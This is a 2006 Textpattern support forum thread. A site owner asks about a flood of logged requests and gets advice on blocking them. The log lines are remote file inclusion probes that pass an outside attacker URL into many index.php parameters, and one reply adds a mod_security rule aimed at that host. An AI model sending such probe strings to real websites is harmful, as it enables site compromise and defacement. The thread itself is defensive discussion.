hacking attempt?

colak · 2006-12-06 15:31:40

the statistics program installed in my wife’s site (hblack.net) shows a lot of “New Resources” with the following urls:

http://hblack.net/index.php?start=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?t=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?tool=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?view=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?visualizar=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?section=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?what=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?where=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?x=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?site=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?letter=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?link=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?resp=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?m=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?category=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?root=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?name=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?change=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?s=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?op=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?file=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?open=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?g=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?see=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?p=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?go=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?send=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?inc=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?show=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?pagina=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?include=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?path=http://207.226.250.183/tool25.gif?

They all come from different ips/isps

is this a hacking attempt or a spam referrer? Any ideas on how I can stop this? I have earlier today blocked 207.226.250.183 via htaccess but I’m not sure if that is enough…

Sencer · 2006-12-06 16:27:40

Prevent what? Random people making random requests to your website? That’s like trying to prevent people from looking at you funny when you walk in the streets. You should keep your efforts focused on keeping all software up to date, and making sure it’s configured as securely as possible (like turning off register_globals in php.ini etc.).

For people who are still keen on blacklisting and playing catch up with bad people, there’s tools like mod_security.

zem · 2006-12-06 20:50:32

Please see the FAQ. People attempt things all the time.

Mary · 2006-12-07 04:37:09

is this a hacking attempt or a spam referrer?

A little of both, actually: it’s a spam referrer, trying to get you to load up that url, in an attempt to deface your site (it’s hoping you are vulnerable, it doesn’t know if you are or not).

colak · 2006-12-07 09:04:30

Sencer wrote

Prevent what? Random people making random requests to your website? That’s like trying to prevent people from looking at you funny when you walk in the streets. You should keep your efforts focused on keeping all software up to date, and making sure it’s configured as securely as possible (like turning off register_globals in php.ini etc.).
For people who are still keen on blacklisting and playing catch up with bad people, there’s tools like mod_security.

Hi sencer. I have mod security to “On” and the particular site is on 4.0.4
Having said that the home page is a static one, with a php extension so as to have the statistics software included.

zem wrote:

Please see the FAQ. People attempt things all the time.

Hi Zem I did have a look at that and the particular site coheres to all the guidelines..

Mary wrote:

bq. is this a hacking attempt or a spam referrer?

A little of both, actually: it’s a spam referrer, trying to get you to load up that url, in an attempt to deface your site (it’s hoping you are vulnerable, it doesn’t know if you are or not).

Hi Mary

Any ideas on how I can stop it? I have already blocked 207.226.250.183 with htaccess but the attempts are still there. I have mod security on. At the moment no harm is done, but they seem to be very insistent and prevention might be better to a cure on this one.

Thank you all for all the advice

Last edited by colak (2006-12-07 09:06:02)

Sencer · 2006-12-07 12:54:02

colak wrote:

Any ideas on how I can stop it?

There is an infinite* number of ways to formulate attacks. Do you want to spend all your time (till infinity) to make an infinite number of rules to block every possible request string? And then have your webserver process that infinite list of rules for every (legitimate or not) request it makes?
A better appraoch might be, to somehow have the webserver only respond to to valid requests and simply shrug off the rest. Oh, wait, that’s already what’s happening (unless the software has security holes, in which case it makes more sense to fix the software, no?)

[* Granted, it’s not infinite in the strict mathematical sense, given that there are techincal limitations, on the size of requests that webservers will accept. But for all practical purposes it’s a really, really bug number]

At the moment no harm is done, but they seem to be very insistent

A stone wall might give in, when people keep running against it. A father might give in, if children continue to pester him with the same question. The good thing is that software doesn’t have or need patience, it also doesn’t decay. For the same set of inputs and starting from the same state, it will always give you the same result. So an attack-bot can be as persistent as it wants and serve the same attack-requests for as long as it wants, it will not bother the software.

and prevention might be better to a cure on this one.

Blacklisting is not prevention, it’s playing catch-up with attacks that have already been tried and failed. It’s the opposite of what ou are trying to do. What you actually want, is not to black the past attacks (they failed already), but to imagine the future attacks, and block those, hence see the beginning of this comment.

Mary · 2006-12-08 01:47:33

You might try the following:

<IfModule mod_security.c>
	SecFilterEngine On

	SecFilterSelective "QUERY_STRING" "(207.226.250.183)" "nolog,redirect:http://207.226.250.183/"
</IfModule>

colak · 2006-12-08 15:26:12

Mary wrote:

You might try the following:

<IfModule mod_security.c>
	SecFilterEngine On

	SecFilterSelective "QUERY_STRING" "(207.226.250.183)" "nolog,redirect:http://207.226.250.183/"
</IfModule>

:( returns a 500 in textdrive

Last edited by colak (2006-12-08 15:27:25)

Mary · 2006-12-09 02:12:00

Are you sure? It works fine for me (on TextDrive).

colak · 2006-12-09 07:58:13

Mary wrote:

Are you sure? It works fine for me (on TextDrive).

yes. I deleted all in my htaccess just to make sure that there was no conflict and the script returned

Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, web@burnaby.textdrive.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

remember… the home page is just a static index.php one whch has nothing to do with txp…

Mary · 2006-12-10 05:28:29

Hmm. Try it without quotes maybe?

<IfModule mod_security.c>
	SecFilterEngine On

	SecFilterSelective QUERY_STRING "(207.226.250.183)" nolog,redirect:http://207.226.250.183/
</IfModule>

colak · 2006-12-10 07:32:11

:( It still returns a 500.

On the up side, hits from 207.226.250.183 have now dropped to 4/day as opposed to about 30, so I guess they are steadily running out of options.

Textpattern CMS

Textpattern CMS support forum

#1 2006-12-06 15:31:40

hacking attempt?

#2 2006-12-06 16:27:40

Re: hacking attempt?

#3 2006-12-06 20:50:32

Re: hacking attempt?

#4 2006-12-07 04:37:09

Re: hacking attempt?

#5 2006-12-07 09:04:30

Re: hacking attempt?

#6 2006-12-07 12:54:02

Re: hacking attempt?

#7 2006-12-08 01:47:33

Re: hacking attempt?

#8 2006-12-08 15:26:12

Re: hacking attempt?

#9 2006-12-09 02:12:00

Re: hacking attempt?

#10 2006-12-09 07:58:13

Re: hacking attempt?

#11 2006-12-10 05:28:29

Re: hacking attempt?

#12 2006-12-10 07:32:11

Re: hacking attempt?

Board footer